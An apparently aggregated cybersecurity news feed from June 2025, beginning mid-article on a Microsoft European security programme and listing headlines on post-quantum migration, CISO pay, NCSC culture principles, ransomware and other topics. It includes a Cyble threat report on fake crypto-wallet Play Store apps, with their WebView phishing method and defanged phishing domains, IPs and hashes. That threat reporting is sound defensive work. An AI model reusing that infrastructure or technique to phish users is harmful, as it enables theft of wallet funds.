nationale Sicherheitsbedürfnisse zugeschnitten sind. Die Informationen basieren auf einer Kombination aus technischer Analyse, Telemetriedaten und KI-gestützter Auswertung. Regierungen sollen damit einen besseren Überblick über Taktiken und Werkzeuge fortgeschrittener Angreifer erhalten – auch in Bezug auf den Missbrauch von KI durch staatliche Akteure. Ein wesentliches Ziel ist es, durch proaktive Informationsbereitstellung in nahezu Echtzeitdie Fähigkeit staatlicher Stellen zu erhöhen, Bedrohungen frühzeitig zu erkennen und abzuwehren. Die Microsoft-Initiative umfasst vier Handlungsfelder zur Stärkung der Cyberabwehr: KI-unterstützte BedrohungsaufklärungMicrosoft beobachtet kontinuierlich Aktivitäten nationalstaatlicher Akteure und nutzt KI, um neue Angriffsvektoren schneller zu erkennen. Die daraus gewonnenen Erkenntnisse werden direkt in die Zusammenarbeit mit europäischen Regierungen eingebracht. Ausweitung des Zugangs zu Cybercrime-IntelligenceDie Microsoft Digital Crimes Unit (DCU) stellt sicherheitsrelevante Informationen künftig verstärkt europäischen Partnern über das Cybercrime Threat Intelligence Program (CTIP) zur Verfügung. Dies ermöglicht eine effektivere Strafverfolgung und schnellere Gegenmaßnahmen bei koordinierter Cyberkriminalität. Früherkennung ausländischer EinflussoperationenDas Microsoft Threat Analysis Center (MTAC) analysiert gezielt digitale Einflussoperationen, die u. a. Deepfakes und KI-generierte Inhalte einsetzen. MTAC wird regelmäßig Analysen zu Desinformationskampagnen, narrativen Mustern und genutzten Plattformen bereitstellen – mit besonderem Fokus auf Bedrohungen für demokratische Institutionen. Priorisierte SicherheitskommunikationÜber etablierte Kanäle wie den Microsoft Security Update Guide und ergänzende Programme stellt Microsoft Informationen zu Schwachstellen und Schutzmaßnahmen schneller und gezielter zur Verfügung. Regierungen erhalten eine bevorzugte Informationslage mit konkreten Handlungsempfehlungen. Ein dedizierter Ansprechpartner bei Microsoft soll künftig für jede teilnehmende Regierung als direkte Koordinationsstelle fungieren. Investitionen in Resilienz, Kooperation und KI-Sicherheit Neben dem Ausbau der Bedrohungsanalyse investiert Microsoft auch substanziell in die europäische Cybersicherheitslandschaft. Im Fokus stehen: Public-Private-Kooperation mit Europol: Ein neues Pilotprojekt bindet DCU-Ermittler direkt beim Europäischen Cybercrime Centre (EC3) ein, um operative Abläufe zu verbessern und gemeinsame Ermittlungen zu ermöglichen. Stärkung der Zivilgesellschaft: Microsoft verlängert die Kooperation mit dem CyberPeace Institute, das NGOs unterstützt und Ransomware-Kampagnen dokumentiert. Technisches Know-how wird dabei von rund 100 freiwilligen Microsoft-Mitarbeitenden bereitgestellt. Regionale Sicherheitsförderung im Westbalkan: Über das Western Balkan Cyber Capacity Centre (WB3C)  fördert Microsoft die Entwicklung lokaler Cybersicherheitskapazitäten in einer geopolitisch exponierten Region. Forschung zu KI-Sicherheit in Großbritannien: Gemeinsam mit dem Laboratory for AI Security Research (LASR) wird ein Forschungsprogramm zu Cybersicherheit in agentischer KI und kritischer Infrastruktur initiiert. Absicherung der Open-Source-Lieferkette: Mit dem GitHub Secure Open Source Fund sollen zentrale europäische OSS-Projekte wie Log4J oder Scancode sicherer gemacht und gegen potenzielle Angriffe gehärtet werden. Mit dem neuen Programm unterstreicht Microsoft sein langfristiges Engagement für ein sicheres digitales Europa. „Unabhängig davon, wie sich die Bedrohungslage entwickelt, bleibt Microsoft ein verlässlicher Partner an der Seite Europas“, versichert Smith. Um zukünftige Abschaltungen zu beschleunigen, hat Microsoft auch das Programm „Statutory Automated Disruption“ (SAD) im April 2025 ins Leben gerufen. Diese Initiative automatisiert Rechtsmissbrauchsmeldungen an Hosting-Anbieter und ermöglicht eine schnellere Entfernung von bösartigen Domains und IP-Adressen. Anfänglich auf Europa und die USA fokussiert, erhöht SAD die Kosten für Geschäfte für Cyberkriminelle und macht es ihnen schwerer, in großem Maßstab zu operieren, hieß es. Darüber hinaus arbeitet Microsoft mit lokalen Internetanbietern zusammen, um die Sicherheit der betroffenen Nutzer zu unterstützen und sicherzustellen, dass die Regierungen eine größere Sichtbarkeit in aufkommende Bedrohungen haben.

https://www.csoonline.com/article/4003066/microsoft-startet-neues-europaisches-sicherheitsprogramm.html
MSFT-CrowdStrike 'Rosetta Stone' for Naming APTs: Meh?
2025-06-06T13:00:00Z | 1749214800

Microsoft and CrowdStrike announced an effort to deconflict the overlapping names of threat groups and reduce confusion for companies, but we've been here before.

https://www.darkreading.com/threat-intelligence/microsoft-crowdstrike-rosetta-stone-apt
This CISA Project should serve as the roadmap to managing cyber risk and efficiency in a cloud era
2025-06-06T13:00:00Z | 1749214800

COMMENTARY | Advanced threats, including ransomware, supply chain breaches and nation-state attacks, exploit the fact that the current approach to cloud security needs improvement.

https://www.nextgov.com/ideas/2025/06/cisa-project-should-serve-roadmap-managing-cyber-risk-and-efficiency-cloud-era/405812/
Cybersecurity Snapshot: Experts Issue Best Practices for Migrating to Post-Quantum Cryptography and for Improving Orgs’ Cyber Culture
2025-06-06T13:00:00Z | 1749214800

Check out a new roadmap for adopting quantum-resistant cryptography. Plus, find out how your company can create a better cybersecurity environment. In addition, MITRE warns about protecting critical infrastructure from cyber war. And get the latest on exposure response strategies and on CISO compensation and job satisfaction.Dive into five things that are top of mind for the week ending June 6.1 - Group releases roadmap for adopting post-quantum cryptographyIs your organization looking for guidance on how to carry out its migration to post-quantum cryptography (PQC)? A group that includes MITRE, Microsoft and IBM just released a roadmap designed to help organizations plan and execute their adoption of PQC.Titled “Post-Quantum Cryptography (PQC) Migration Roadmap,” the 20-page document from the “Post Quantum Cryptography Coalition” breaks down PQC migrations into four major stages:Preparation, which includes identifying the transition’s main goals, assigning a project leader and identifying key stakeholdersBaseline understanding, which includes a comprehensive inventory of the data and assets to be protected, as well as determining required resources and budgetsPlanning and execution, which includes collaboration with internal and external partners to either acquire or develop the necessary tools for the migrationMonitoring and evaluation, which includes establishing metrics for tracking the project’s progress and for reassessing cryptographic security, based on the evolution of quantum capabilities "This roadmap empowers CIOs and CISOs to act decisively, taking proactive steps to protect sensitive data now and in the future,” Wen Masters, MITRE’s VP of cyber technologies, said in a statement. Transitioning to PQC, also known as quantum-resistant cryptography, is a complex process that’s expected to take the typical enterprise multiple years to complete and, as such, it will require exacting planning and ultra-precise execution.Embarking on the process to adopt PQC is necessary because when quantum computers become generally available — expected to happen at some point between 2030 and 2040 — they’ll be able to crack today’s public key cryptographic algorithms, which protect all types of digitally stored and transmitted dataAlgorithms for quantum-resistant encryption are already available. The U.S. National Institute of Standards and Technology (NIST) released three quantum-resistant algorithm standards in 2024 and expects to release a fourth in 2026. There’s another PQC standard called Covercrypt from the European Telecommunications Standards Institute (ETSI). Earlier this year, NIST picked its fifth PQC algorithm, expected to be available for use in 2027. Other resources designed to help organizations with PQC adoption include NIST’s white paper “Considerations for Achieving Crypto Agility” and the U.K. National Cyber Security Centre’s (NCSC) “Timelines for migration to post-quantum (PQC) cryptography.” For more information about how to protect your organization against the quantum computing cyber threat:“How to achieve crypto-agility and future-proof security” (TechTarget)“Moody’s sounds alarm on quantum computing risk, as transition to PQC ‘will be long and costly’” (Industrial Cyber)“Post-quantum cryptography migration use cases” (IETF)“US unveils new tools to withstand encryption-breaking quantum. Here's what experts are saying” (World Economic Forum)“You need to prepare for post-quantum cryptography now. Here’s why” (SC World)“Quantum and the Threat to Encryption” (SecurityWeek)2 - How to establish a great cybersecurity culture in your orgCorporate culture can have a major impact on the success or failure of a company’s cybersecurity efforts. So how do you create an organizational environment that boosts cybersecurity?That’s the question the U.K. National Cyber Security Centre (NCSC) tackled with the publication this week of its “Cyber security culture principles” guidance. The document unpacks six core recommendations aimed at getting the staff to embrace cybersecurity processes. “The principles describe cultural conditions that are essential underpinnings for an organisation to be cyber secure and offer an approach to developing that culture,” reads an NCSC blog. Here’s a high-level view of three of these principles:Frame cyber as an enabler: Foster a sense that cybersecurity is everyone’s responsibility by clearly positioning it as a “shared purpose.” Demonstrate how cybersecurity isn’t a barrier to but rather a facilitator for achieving business goals.Encourage openness: Make it easy for employees to report security issues and to ask questions. Investigate issues fairly and transparently, with the goal of fixing problems and sharing lessons learned, as opposed to affixing blame.Embrace change: Stay attuned to emerging cyber risks and be ready to modify cybersecurity processes accordingly. Show how this capacity to adapt to new cyber threats helps strengthen the organization’s resilience.For more information about creating a healthy cybersecurity culture in your organization:“How to Create an Enterprise-Wide Cybersecurity Culture” (Information Week)“A new age of cybersecurity culture” (KPMG)“Signs Your Organization's Culture Is Hurting Your Cybersecurity” (Dark Reading)“How to turn around a toxic cybersecurity culture” (CSO)“Creating a Culture of Cybersecurity Awareness” (IT Executives Council)VIDEOImprove Your Cyber Security Culture (SANS Institute)3 - MITRE: U.S. critical infrastructure must be ready for cyber warIn addition to preventing and mitigating standalone cyber threats and attacks, U.S. critical infrastructure organizations must have a plan in case a lengthy, widespread cyber war breaks out.That’s the call from MITRE, which has published a fact sheet with key actions for getting critical infrastructure organizations ready for an all-out cyber conflict that disrupts multiple essential services for a sustained period of time.Titled “5 Steps To Prepare Critical Infrastructure for a Cyber War,” the document is aimed at critical infrastructure operators; federal, state and local governments; businesses; and communities. The fact sheet is based on a classified tabletop exercise held at MITRE’s headquarters in December in which 70 government and private-sector organizations participated in a simulated cyber war.“The event revealed the urgent need for infrastructure owners/operators, government agencies, and communities to shift from addressing isolated cyber incidents to preparing for large-scale cyber conflicts lasting weeks to months,” the document reads.Here are five steps MITRE views as necessary for critical infrastructure organizations to get ready for a cyber war scenario:Create a civil defense mindset: Make citizens aware that basic services like electricty, water, telecom and transportation may be impacted. Stakeholders should plan how to issue emergency responses and how to prioritize restoration efforts.Manage limited resources: Critical infrastructure operators should test their incident response plans, while governments must plan with businesses how to address service outages.Plan to operate under extreme conditions: Recovering from the impacts of cyber war requires planning for coping with devastating outages that last weeks. Measures should include training staff for manual, disconnected operations, and boosting cyber resilience.Strengthen emergency communications systems: Develop communication systems and processes that’ll withstand a cyber war’s disruptions, along with ways to authenticate the identity of those involved.Ensure workforce readiness: Because the workforce will likely shrink during a cyber war emergency, contingency plans should be made to operate with a smaller staff, including training workers for this scenario.Full details about the tabletop exercise are available to U.S. critical infrastructure owners and operators, as well as to government agencies. Those interested can request access by writing to this email address: CICSTTX@mitre.org.For more information about cyber warfare:“Preparing for Cyber Warfare: 6 Key Lessons From Ukraine” (Dark Reading)“Cyberwarfare: The new frontlines” (Cybersecurity Guide)“‘Russia can turn the lights off’: how the UK is preparing for cyberwar” (The Guardian)“The Growing Threat of Cyberwarfare from Nation-States” (PaymentsJournal)“Russia’s Most Notorious Special Forces Unit Now Has Its Own Cyber Warfare Team” (Wired)4 - Tenable webinar poll spotlights exposure response strategiesDuring our recent “Tenable Vulnerability Management Customer Update, June 2025” webinar, we polled attendees on their exposure response strategies and challenges. Check out what they said.(152 webinar attendees polled by Tenable, June 2025)  (145 webinar attendees polled by Tenable, June 2025. Respondents could choose more than one answer.)Watch this on-demand webinar to get the latest on Tenable Vulnerability Management and to learn how to develop exposure response strategies.5 - Despite high salaries, many CISOs at large orgs are dissatisfiedWith median salaries north of $500,000 and top earners making $1.3 million-plus annually, CISOs at large enterprises are making bank, but, ironically, job dissatisfaction among them is high.That’s according to the “2025 Compensation and Budget for CISOs in Large Enterprises Benchmark Report” from IANS Research and Artico Search, which also found that a large percentage of these CISOs are actively looking for new jobs.“Large enterprise CISOs might be among the highest paid across industries, yet our report reveals that many CISOs feel stretched too thin, and low job satisfaction keeps them open to new opportunities,” reads an IANS Research blog about the report.Specifically, many of these CISOs are unhappy with their team’s budget and, to a lesser extent with their compensation. It’s also common for them to struggle broadening their focus from overseeing cybersecurity technology to supporting business initiatives.“When elevating an enterprise CISO role, the position is less about technical acumen and more about business risk and business alignment,” Matt Comyns, Artico Search co-founder and president, said in the blog. “In some respects, the market is training technical leaders in a way that is mismatched from the aspired job of CISO,” he added. (Source: “2025 Compensation and Budget for CISOs in Large Enterprises Benchmark Report” from IANS Research and Artico Search, May 2025)The report defines these CISOs as those who work at enterprises with more than $1 billion in revenue. They make an average of about $700,000 in total compensation annually.For more information about CISO trends:“Why Security Leaders Are Opting for Consulting Gigs” (Dark Reading)“CISO Burnout Is Increasing — Here’s How to Help Them” (Reworked)“CISO Paychecks: Worth the Growing Security Headaches?” (Dark Reading)“Has the CISO finally been accepted as a key strategic player?” (Deloitte)“CISOs in 2025: Evolution of a High-Profile Role” (Information Week)

https://www.tenable.com/blog/cybersecurity-snapshot-postquantum-cryptography-migration-roadmap-best-practices-06-06-2025
Over 20 Crypto Phishing Applications Found on the Play Store Stealing Mnemonic Phrases
2025-06-06T12:46:32Z | 1749213992

Key Takeaways Over 20 malicious applications have been discovered actively targeting crypto wallet users. The apps impersonate popular wallets such as SushiSwap, PancakeSwap, Hyperliquid, and Raydium. They prompt users to enter their 12-word mnemonic phrase to access fraudulent wallet interfaces. These apps are distributed through the Play Store under compromised or repurposed developer accounts. Threat actors employ a common set of techniques: embedding phishing URLs in privacy policies, reusing package naming patterns, and utilizing frameworks for rapid deployment. Overview Cyble Research and Intelligence Labs (CRIL) has identified more than 20 cryptocurrency phishing applications on the Google Play Store. These malicious apps impersonate legitimate wallets like SushiSwap, PancakeSwap, Hyperliquid, and others. They employ phishing techniques to steal users’ mnemonic phrases, which are then used to access real wallets and drain cryptocurrency funds.   These apps have been progressively discovered over recent weeks, reflecting an ongoing and active campaign. Upon discovery, CRIL promptly reported the applications to Google, resulting in the removal of most of them from the Play Store. However, as of the time of publishing, a few of these applications are still live on the platform and have been reported for takedown. Figure 1 – Malicious application impersonating Hyperliquid wallet Figure 2 – Malicious application impersonating SushiSwap wallet The icons of legitimate wallets that we observed being used by the malicious applications to lure victims into trusting them have been listed below: Figure 3 – Legitimate wallet icons used by malicious apps We also observed that these malicious applications exhibit consistent patterns, such as embedding Command and Control (C&C) URLs within their privacy policies and using similar package names and descriptions. Despite these similarities, the apps are published under different developer accounts. These accounts were originally used to distribute legitimate apps, including gaming, video downloader, and live streaming applications, and some have amassed over 100,000 downloads. This behavior suggests that these older developer accounts have likely been compromised and are now being leveraged to distribute malicious applications. Figure 4 – Developer account previously hosting gaming apps and now distributing a malicious phishing app The malicious applications we found on the Play Store stealing Mnemonic Phrases of crypto wallet applications are: Name Package name Privacy Policy Pancake Swap co.median.android.pkmxaj hxxps://pancakefentfloyd.cz/privatepolicy.html Suiet Wallet co.median.android.ljqjry hxxps://suietsiz.cz/privatepolicy.html Hyperliquid co.median.android.jroylx hxxps://hyperliqw.sbs/privatepolicy.html Raydium co.median.android.yakmje hxxps://raydifloyd.cz/privatepolicy.html Hyperliquid co.median.android.aaxblp hxxps://hyperliqw.sbs/privatepolicy.html BullX Crypto co.median.android.ozjwka hxxps://bullxni.sbs/privatepolicy.html OpenOcean Exchange co.median.android.ozjjkx hxxps://openoceansi.sbs/privatepolicy.html Suiet Wallet co.median.android.mpeaaw hxxps://suietsiz.cz/privatepolicy.html Meteora Exchange co.median.android.kbxqaj hxxps://meteorafloydoverdose.sbs/privatepolicy.html Raydium co.median.android.epwzyq hxxps://raydifloyd.cz/privatepolicy.html SushiSwap co.median.android.pkezyz hxxps://sushijames.sbs/privatepolicy.html Raydium co.median.android.pkzylr            hxxps://raydifloyd.cz/privatepolicy.html SushiSwap co.median.android.brlljb hxxps://sushijames.sbs/privatepolicy.html Hyperliquid co.median.android.djerqq hxxps://hyperliqw.sbs/privatepolicy.html Suiet Wallet co.median.android.epeall            hxxps://suietwz.sbs/privatepolicy.html BullX Crypto co.median.android.braqdy hxxps://bullxni.sbs/privatepolicy.html Harvest Finance blog co.median.android.ljmeob hxxps://harvestfin.sbs/privatepolicy.html Pancake Swap co.median.android.djrdyk            hxxps://pancakefentfloyd.cz/privatepolicy.html Hyperliquid co.median.android.epbdbn hxxps://hyperliqw.sbs/privatepolicy.html Suiet Wallet co.median.android.noxmdz hxxps://suietwz.sbs/privatepolicy.html In addition to the 20 applications that shared similar privacy policies and leveraged the Median framework, we also identified two applications that used different package names and privacy policies. Despite these differences, their underlying objective remained the same: to steal users' Mnemonic Phrases. Application name Package names Privacy Policy Raydium cryptoknowledge.rays hxxps://www.termsfeed.com/live/a4ec5c75-145c-47b3-8b10-d43164f83bfc PancakeSwap com.cryptoknowledge.quizzz hxxps://www.termsfeed.com/live/a4ec5c75-145c-47b3-8b10-d43164f83bfc The following section covers the technical details of these malicious applications. Technical Details Type 1: Use of the Median Framework A Threat Actor was observed leveraging the Median framework to develop Android applications. This framework enables rapid conversion of websites into Android apps. Upon analyzing the configuration file, we found that the URL "hxxps://pancakefentfloyd[.]cz/api.php" was being used, which also matches the application's privacy policy URL. Figure 5 – App config file containing a phishing URL This URL leads to a phishing website specifically designed to steal mnemonic phrases and is loaded within a WebView in the application. In this instance, the phishing site impersonates the legitimate "PancakeSwap" wallet and prompts victims to enter their 12-word mnemonic phrase to gain access to their wallet. Figure 6 – Pancake Swap Phishing page loaded into Webview Type 2: Loading Phishing URL into Webview In the second type of malicious application, the Threat Actor directly loads a phishing website into a WebView without using any development framework. The malware opens the URL "hxxps://piwalletblog[.]blog" within the WebView, impersonating the legitimate Raydium wallet. Similar to the previously observed apps, this malicious application also prompts the user to enter their 12-word mnemonic phrase. Figure 7 – Loading phishing URL into WebView Figure 8 – Phishing site impersonating the Raydium wallet and asking for the Mnemonic phrase The phishing URL “hxxps://pancakefentfloyd[.]cz”, used in one of the observed malicious applications, is hosted on the IP address 94.156.177[.]209. A deeper investigation into this infrastructure uncovered that this IP is associated with over 50 phishing domains, all connected to a broader campaign aimed at stealing mnemonic phrases from users of various cryptocurrency wallets. Figure 9 – IP hosting multiple phishing domains These domains impersonate well-known crypto services and are designed to be loaded directly within mobile applications using WebView, making detection more challenging. The threat actor appears to be reusing this infrastructure across multiple fake apps and wallet brands, indicating a centralized and well-coordinated operation. Conclusion This campaign highlights a well-coordinated phishing operation targeting the rapidly growing user base of cryptocurrency wallets. By distributing over 20 counterfeit Android applications through the Google Play Store, the threat actors impersonate legitimate wallets such as PancakeSwap, SushiSwap, Raydium, and others to steal users’ mnemonic phrases—the essential keys to accessing their digital assets. What makes this campaign particularly dangerous is the use of seemingly legitimate applications, hosted under previously benign or compromised developer accounts, combined with a large-scale phishing infrastructure linked to over 50 domains. This not only extends the campaign’s reach but also lowers the likelihood of immediate detection by traditional defenses. If successful, these attacks can result in irreversible financial losses for victims, particularly since cryptocurrency transactions are not easily reversible or safeguarded like those in traditional banking. As the crypto ecosystem continues to expand, users must remain vigilant, and ecosystem stakeholders—including app stores, security vendors, and developers—must take proactive measures to swiftly identify, block, and report such threats. Our Recommendations We have outlined essential cybersecurity best practices that serve as the first line of defense against attackers. We recommend that our readers adhere to the best practices listed below: Download apps only from verified developers. Check app reviews and avoid apps that request sensitive information, such as mnemonic phrases. Use a reputable antivirus and internet security software package on your connected devices, including PCs, laptops, and mobile devices. Create strong passwords and implement multi-factor authentication wherever possible. Where applicable, enable biometric security features, such as fingerprint or facial recognition, to unlock your mobile device. Be cautious about opening any links received via SMS or emails that land in your phone. Ensure that Google Play Protect is enabled on Android devices. Indicators of Compromise (IOCs) Indicators Indicator Type Description 4b35a1ed93ab68f0401de34d4eb5dbb582465ee2a8428e16d0beac8bf87a09af   SHA256 Crypto phishing app impersonating Pancake Swap f288c626be0ba452e098d11b207867793522373c SHA1 Crypto phishing app impersonating Pancake Swap b703efe31690b6f84676e795d33f6283 MD5 Crypto phishing app impersonating Pancake Swap hxxps://pancakefentfloyd[.]cz/api.php URL Phishing URL loaded into Webview 4aa3659c50616d21ef0bda1389cba1ad3fe768b9dd25eee09289ece97cd3623f   SHA256   Crypto phishing app impersonating Raydium Wallet 265970e7f8f5c9618ffc215c7612eff4fe97f20a SHA1 Crypto phishing app impersonating Raydium Wallet b2e6fd5f9662c4215f89240c8c960977 MD5 Crypto phishing app impersonating Raydium Wallet hxxps://piwalletblog[.]blog URL Phishing site loaded into WebView cryptoknowledge[.]clickraydi-commerce[.]cz cetusdi[.]sbssuiscanfl[.]sbs suivisionsl[.]sbs suietsiz[.]cz openoceansi[.]sbs bravebn[.]sbs bullxni[.]sbs walrusod[.]sbs raydifloyd[.]czmeteorafloydoverdose[.]sbs bitunixflo[.]sbspancakefentfloyd[.]cz suietwz[.]sbs hyperliqw[.]sbs pumpjake[.]sbs raydiumsm[.]sbs harvestfin[.]sbs staratlas[.]sbs bubblemapsblogs[.]sbs sushijames[.]sbs aerodromeaz[.]sbs meteorablog[.]siteaerodromesblogs[.]site suietwallets[.]site jumperblogs[.]site sushiblogsite[.]site raydiumblogs[.]site pancakws[.]ru solscanpv[.]ru meteorasp[.]ru Domain Crypto phishing domain The post Over 20 Crypto Phishing Applications Found on the Play Store Stealing Mnemonic Phrases appeared first on Cyble.

https://cyble.com/blog/crypto-phishing-applications-on-the-play-store/
Why CISOs are quietly becoming information architects
2025-06-06T12:45:00Z | 1749213900

In a recent post, I explored the butterfly effect of cybersecurity—the idea that one small misstep (like an over-permissioned user or misclassified document) can cascade into a major breach. Today, I want to go a step further: because it’s not just about access—it’s about architecture. Cybersecurity has always been about control. But what we’re controlling is changing. As data sprawls across SaaS platforms, cloud systems, and unstructured repositories, CISOs are being pulled upstream—into data strategy, lifecycle management, and governance. They’re not just protecting endpoints anymore. They’re shaping how information flows throughout their business. The shift: from defense to data-centric design For years, the CISO focused on defending the perimeter. But Gartner, Forrester, and IDC all point to the same reality: the perimeter is gone. Data itself is now the security object of value. As Gartner puts it,  “Security must become data-centric to align protection with business value.” While according to Forrester: “CISOs must become stewards of enterprise data, not just defenders of infrastructure.” That means asking: What data do we have? Where does it live? Who can access it—and why? What risk does it pose if exposed or misused? These are information architecture questions—not just security questions. Information sprawl = attack surface Every enterprise is a patchwork of productivity: Files in Box Shared links in Google Drive Unclassified documents in SharePoint Shadow data in abandoned AWS buckets This isn’t just messy—it’s risky. When information is unmanaged, security can’t protect what it can’t see. Governance and cybersecurity are converging Data protection regulations like GDPR, CCPA, and Australia’s Privacy Act reforms are raising the bar. It’s not enough to encrypt data or respond to breaches. Organizations must: Map sensitive data Classify it properly Apply risk-based controls Prove enforcement and accountability That convergence is putting CISOs in the same room as Chief Data Officers, legal, privacy, and compliance teams—not to react to incidents, but to architect prevention. The Modern CISO: Strategist. Steward. Architect. The CISO of 2025 isn’t just a technologist or risk manager. They’re part data strategist, information steward and architect of trust. Cybersecurity today isn’t just about stopping threats. It’s about enabling responsible innovation, privacy, and business trust—by understanding and protecting the flow of information. Final thought We used to ask. “How do we protect the network?” Then: “How do we secure identities and endpoints?” Now we ask, “How do we protect the data that powers the business—no matter where it lives?” That’s not just a security challenge. It’s an information architecture mandate. And many CISOs are already quietly stepping into that role. How is your security team evolving to handle information risk? Are you seeing the same convergence of data, governance, and cybersecurity? Additional sources ISACA, “Security teams are now responsible for classification, lifecycle, and access across business data.” IDC, “Effective data security starts with understanding the value of the data being used within the organization.” The post Why CISOs are quietly becoming information architects appeared first on OpenText Blogs.

https://blogs.opentext.com/why-cisos-are-quietly-becoming-information-architects/
Kettering Health confirms attack by Interlock ransomware group as health record system is restored
2025-06-06T12:41:33Z | 1749213693

The Ohio-based Kettering Health system said a recent cyberattack was by the Interlock ransomware gang, which had claimed to steal troves of data from the organization.

https://therecord.media/kettering-health-ohio-interlock-ransomware
Kettering Health confirms attack by Interlock ransomware group as health record system is restored
2025-06-06T12:41:33Z | 1749213693

The Ohio-based Kettering Health system said a recent cyberattack was by the Interlock ransomware gang, which had claimed to steal troves of data from the organization.

https://therecord.media/kettering-health-ohio-interlock-ransomware
Cybersecurity M&A Roundup: 42 Deals Announced in May 2025
2025-06-06T12:38:40Z | 1749213520

The number of cybersecurity-related merger and acquisition (M&A) announcements surged in May 2025. The post Cybersecurity M&A Roundup: 42 Deals Announced in May 2025 appeared first on SecurityWeek.

https://www.securityweek.com/cybersecurity-ma-roundup-42-deals-announced-in-may-2025/
What Are The Key Components Of A Successful Human Risk Management Program?
2025-06-06T12:38:25Z | 1749213505

When it comes to cybersecurity, organizations face an ever-present and often underestimated threat: human risk.

https://blog.knowbe4.com/what-are-the-key-components-of-a-successful-human-risk-management-program
Fake MFA Reset Warning Message
2025-06-06T12:37:54Z | 1749213474

A KnowBe4 co-worker of mine recently got this SMS phishing message (i.e., smish).

https://blog.knowbe4.com/fake-mfa-reset-warning-message
Leadership, Trust, and Cyber Hygiene: NCSC’s Guide to Security Culture in Action
2025-06-06T12:28:32Z | 1749212912

The UK’s National Cyber Security Centre (NCSC) has introduced a set of six core principles to help organizations embed strong cybersecurity practices into their everyday operations. Developed in collaboration with government and industry leaders, this guidance aims to instill a lasting culture of security—one that prioritizes both technical controls and human behaviors to achieve sustainable cyber resilience.  Rather than focusing solely on compliance or isolated training efforts, the NCSC’s approach encourages organizations to foster a mindset of cyber hygiene, awareness, and responsibility at all levels. These core principles provide a flexible framework to guide cultural transformation and are tailored to suit organizations of all sizes and industries.  Why Culture Matters in Cybersecurity  Cybersecurity culture encompasses the collective values, behaviors, and norms that shape how individuals think about and respond to security risks. According to the NCSC, successful outcomes are not just the result of technological defenses but emerge when secure behaviors are routinely understood, encouraged, and practiced across the workforce.  The guidance is especially valuable for both cybersecurity professionals and leadership teams. While security teams may define strategies and implement controls, long-term cultural change requires buy-in from leadership—those who shape priorities, influence workplace norms, and model secure behaviors.  The Six Core Principles from NCSC  Frame Cybersecurity as an Enabler Organizations should align cybersecurity with their mission and objectives. Instead of viewing security as a hindrance, leaders must integrate it as a function that supports productivity, innovation, and trust. For example, framing secure practices as essential to protecting customer trust can create alignment between operational goals and cyber hygiene. When leadership communicates the value of security, it fosters a sense of shared purpose.  Encourage Openness Through Trust and Safety Creating psychological safety is key to encouraging secure behavior. Employees should feel comfortable reporting incidents, admitting mistakes, or asking questions, without fear of blame. Organizations that foster open communication and transparent incident handling are more agile and responsive to threats. “When people don’t fear punishment for reporting errors, they are more likely to contribute to organizational learning,” says the NCSC.  Adapt to Change to Improve Resilience Cyber threats evolve quickly, and security must evolve too. This principle encourages organizations to treat change as an opportunity for progress, not a threat. Whether updating policies or introducing new tools, the process should include collaboration across departments. Routine threat monitoring and employee feedback loops can help identify areas for improvement. Importantly, organizations must avoid "change fatigue" by ensuring that updates serve meaningful, strategic purposes.  Acknowledge the Role of Social Norms Informal behaviors often shape security more than formal rules. Social norms—like sharing passwords or circumventing protocols—can undermine well-intentioned policies if left unchecked. The NCSC recommends identifying both helpful and harmful norms and using positive peer influence to encourage secure behavior. For example, newcomers who see colleagues practicing good cyber hygiene are more likely to adopt those habits themselves.  Recognize Leadership’s Role in Cultural Change Leadership plays a crucial role in cultivating a secure culture. Leaders must model secure behavior, communicate its value, and build trust. When senior staff demonstrate openness about past mistakes or security challenges, they normalize learning and reduce fear. In contrast, when leadership ignores or bypasses policies, it sets a dangerous precedent. “Leadership sets the tone for the organization and can drive alignment between business and security objectives,” the NCSC notes.  Maintain Accessible and Clear Security Guidance  Security policies must be practical, understandable, and accessible. Overly complex or outdated guidelines not only confuse employees but also increase vulnerability. Policies should be written in plain language, tested in real-world scenarios, and regularly updated. Embedding these rules into onboarding and ongoing training helps reinforce good practices. Clear signage, simple language, and timely updates all contribute to effective governance.  Putting the Principles into Practice  Each principle is accompanied by real-world examples and practical suggestions. For instance:  Principle 1: Instead of security blocking sales efforts, sales and IT teams collaborate to create secure, efficient workflows.  Principle 2: Employees are encouraged to flag suspicious activity without fear of repercussions.  Principle 3: Cross-functional teams work together to find secure alternatives to unauthorized tools.  Principle 4: Guests are directed to a secure Wi-Fi network instead of being granted internal access.  Principle 5: Executives avoid excessive permissions, reinforcing best practices in access control.  Principle 6: Outdated pandemic-era policies are reviewed, updated, and clearly communicated.  Tools to Support Cultural Change  [caption id="" align="alignnone" width="960"] NCSC Cyber Security Culture Iceberg[/caption] The NCSC also offers the "Cyber Security Culture Iceberg" infographic, illustrating the visible and hidden elements that influence behavior. Surface-level actions—like following password policies—are supported by deeper organizational values, leadership practices, and team dynamics.  To reinforce these core principles, organizations are encouraged to:  Establish clear feedback mechanisms to evaluate current practices.  Bring together diverse stakeholders to collaboratively develop or refine policies.  Align rules with business goals and ensure they are user-friendly.  Celebrate secure behavior and use incentives to reinforce good habits.

https://thecyberexpress.com/ncscs-announces-six-principles/
Zero Networks Raises $55M Series C to Usher in the “Era of the Defender”
2025-06-06T12:25:00Z | 1749212700

For years, cyber attackers have held a strategic advantage. Zero Networks is changing that.  With a newly raised $55 million in Series C funding, Zero is paving the way for the Era of the Defender – a paradigm shift in cybersecurity that removes the burden from defenders reacting to threats and places it on attackers, forcing them to confront proactive, identity- and network-driven controls.  A New Age in Cybersecurity   Zero Networks’ Series C, led by Highland Europe…

https://zeronetworks.com/blog/zero-networks-raises-55m-series-c
DOJ moves to claim $7.74 million tied to North Korean IT worker scheme
2025-06-06T12:24:45Z | 1749212685

The U.S. government wants to confiscate millions of dollars in funds tied to illegal employment of North Korean IT workers at American companies.

https://therecord.media/north-korea-it-worker-scams-doj-civil-forfeiture-claim
DOJ moves to claim $7.74 million tied to North Korean IT worker scheme
2025-06-06T12:24:45Z | 1749212685

The U.S. government wants to confiscate millions of dollars in funds tied to illegal employment of North Korean IT workers at American companies.

https://therecord.media/north-korea-it-worker-scams-doj-civil-forfeiture-claim
DOJ moves to claim $7.74 million tied to North Korean IT worker scheme
2025-06-06T12:24:45Z | 1749212685

The U.S. government wants to confiscate millions of dollars in funds tied to illegal employment of North Korean IT workers at American companies.

https://therecord.media/north-korea-it-worker-scams-doj-civil-forfeiture-claim
New Pressures, Old Systems: Why Government CISOs Are Calling for Cyber Resilience Now
2025-06-06T12:05:19Z | 1749211519

